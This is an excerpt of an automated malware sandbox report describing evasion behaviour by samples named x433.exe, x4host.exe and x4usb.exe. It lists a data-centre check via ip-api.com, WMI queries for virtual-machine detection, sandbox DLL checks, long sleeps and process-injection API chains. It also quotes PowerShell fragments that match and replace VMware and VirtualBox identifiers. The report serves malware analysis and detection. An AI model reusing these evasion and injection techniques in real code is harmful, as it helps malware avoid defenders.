Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,FindCloseChangeNotification,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle, 5_2_0000000140001868
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\x4host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, x4host.exe.0.dr, x4usb.exe.2.dr Binary or memory string: SBIEDLL.DLLCUSJ8UQGKRLJNAXNT6GA7PCHOZROFCGCGMCV8A058YIW0ANSSVE5NMBP6ECJ9C3ENP6LCC0XTD9NV4P7SATWGKGWWJELNDNAHWQXHACY0AU8TTKZQCF12VXLCJIRVTHCKGNAFSA5CGSAWHAT4K7J1VB1XD74A4TSL12K5XOHQWCJI4W892GJTBHNET83WZF0MCJXDIWABCIQC37A7I0UGRNSGGQQM7NQSUICKFAQPDZ07GCG2LARGGN4N1KWBHJS17GG8OHYIDD7YHJPCRVPH9BRUFE6NFMN75VIF57OYMQFBGLNYCCBWATT1ULITUI2D0YNXOOJSIMUSEE1FIR8CT9RQERHPOWMZELSR6COGPNCZ7FDR6FIPICQZQZYCNWRH85Q3YCY3JB8QDF4YUKFYY0VINFO
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\x433.exe Memory allocated: A90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Memory allocated: 1A990000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Memory allocated: 30B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Memory allocated: 1B180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\x4usb.exe Memory allocated: D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\x4usb.exe Memory allocated: 1AA70000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\x433.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\x4usb.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Window / User API: threadDelayed 8461 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Window / User API: threadDelayed 1364 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4768 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3338 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 470 Jump to behavior
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 7592 Jump to behavior
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 2408 Jump to behavior
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9964 Jump to behavior
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 1173 Jump to behavior
Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9855 Jump to behavior
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\lsass.exe API coverage: 9.1 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\x433.exe TID: 6616 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe TID: 6620 Thread sleep time: -23980767295822402s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep count: 4768 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep count: 3338 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3444 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 6992 Thread sleep count: 470 > 30 Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 6992 Thread sleep time: -47000s >= -30000s Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 3152 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep count: 7592 > 30 Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep time: -7592000s >= -30000s Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep count: 2408 > 30 Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep time: -2408000s >= -30000s Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 6552 Thread sleep count: 9964 > 30 Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 6552 Thread sleep time: -9964000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6764 Thread sleep count: 1173 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6764 Thread sleep time: -1173000s >= -30000s Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6788 Thread sleep count: 9855 > 30 Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6788 Thread sleep time: -9855000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6808 Thread sleep count: 250 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6808 Thread sleep time: -250000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7076 Thread sleep count: 252 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7076 Thread sleep time: -252000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7116 Thread sleep count: 253 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7116 Thread sleep time: -253000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7092 Thread sleep count: 249 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7092 Thread sleep time: -249000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3608 Thread sleep count: 197 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3608 Thread sleep time: -197000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1104 Thread sleep count: 251 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1104 Thread sleep time: -251000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5696 Thread sleep count: 239 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5696 Thread sleep time: -239000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2380 Thread sleep count: 246 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2380 Thread sleep time: -246000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2932 Thread sleep count: 251 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2932 Thread sleep time: -251000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5432 Thread sleep count: 251 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5432 Thread sleep time: -251000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1436 Thread sleep count: 243 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1436 Thread sleep time: -243000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1196 Thread sleep count: 238 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1196 Thread sleep time: -238000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1704 Thread sleep count: 252 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1704 Thread sleep time: -252000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6908 Thread sleep count: 251 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6908 Thread sleep time: -251000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7052 Thread sleep count: 253 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7052 Thread sleep time: -253000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6672 Thread sleep count: 250 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6672 Thread sleep time: -250000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7088 Thread sleep count: 242 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7088 Thread sleep time: -242000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2000 Thread sleep count: 245 > 30
Source: C:\Windows\System32\svchost.exe TID: 2000 Thread sleep time: -245000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6964 Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 6964 Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7048 Thread sleep count: 238 > 30
Source: C:\Windows\System32\svchost.exe TID: 7048 Thread sleep time: -238000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6976 Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 6976 Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4420 Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 4420 Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6320 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 6320 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 5288 Thread sleep count: 188 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 5288 Thread sleep time: -188000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2180 Thread sleep count: 226 > 30
Source: C:\Windows\System32\svchost.exe TID: 2180 Thread sleep time: -226000s >= -30000s
Source: C:\Users\user\AppData\Local\x4usb.exe TID: 5840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5716 Thread sleep count: 227 > 30
Source: C:\Windows\System32\svchost.exe TID: 5716 Thread sleep time: -227000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1352 Thread sleep count: 239 > 30
Source: C:\Windows\System32\svchost.exe TID: 1352 Thread sleep time: -239000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4544 Thread sleep count: 62 > 30
Source: C:\Windows\System32\svchost.exe TID: 4544 Thread sleep time: -62000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1984 Thread sleep count: 61 > 30
Source: C:\Windows\System32\svchost.exe TID: 1984 Thread sleep time: -61000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\x4host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\x4usb.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A6E630 FindFirstFileExW, 5_2_000002D8B0A6E630
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC64E630 FindFirstFileExW, 6_2_00000225DC64E630
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AEE630 FindFirstFileExW, 7_2_00000202C0AEE630
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A66130E630 FindFirstFileExW, 8_2_000002A66130E630
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE26E630 FindFirstFileExW, 9_2_000002BAAE26E630
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879CE630 FindFirstFileExW, 10_2_0000026A879CE630
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537AE630 FindFirstFileExW, 11_2_00000179537AE630
Source: C:\Users\user\Desktop\x433.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\x4usb.exe Thread delayed: delay time: 922337203685477
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000E.00000002.2961583336.000001845AC2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000029.00000000.1906283750.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1906340282.0000023D10043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2956233621.0000023D10043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2975747132.0000023D10900000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2954926787.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.16.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 00000008.00000002.2956012355.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.16.dr Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: x4usb.exe.2.dr Binary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000010.00000000.1798422088.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2955107505.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000021.00000000.1866560549.000002644A640000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
Source: svchost.exe, 00000010.00000000.1800562780.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: VMware
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.16.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 00000021.00000002.2948190504.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: x4host.exe, 00000002.00000002.3000681433.000000001C086000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJJ
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 00000009.00000002.3038914037.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.16.dr Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: lsass.exe, 00000007.00000002.2960383043.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744038298.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1747028955.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2954846604.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.1781345340.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2948010267.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2949153556.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1782563333.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1786857019.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2962792700.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1798422088.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
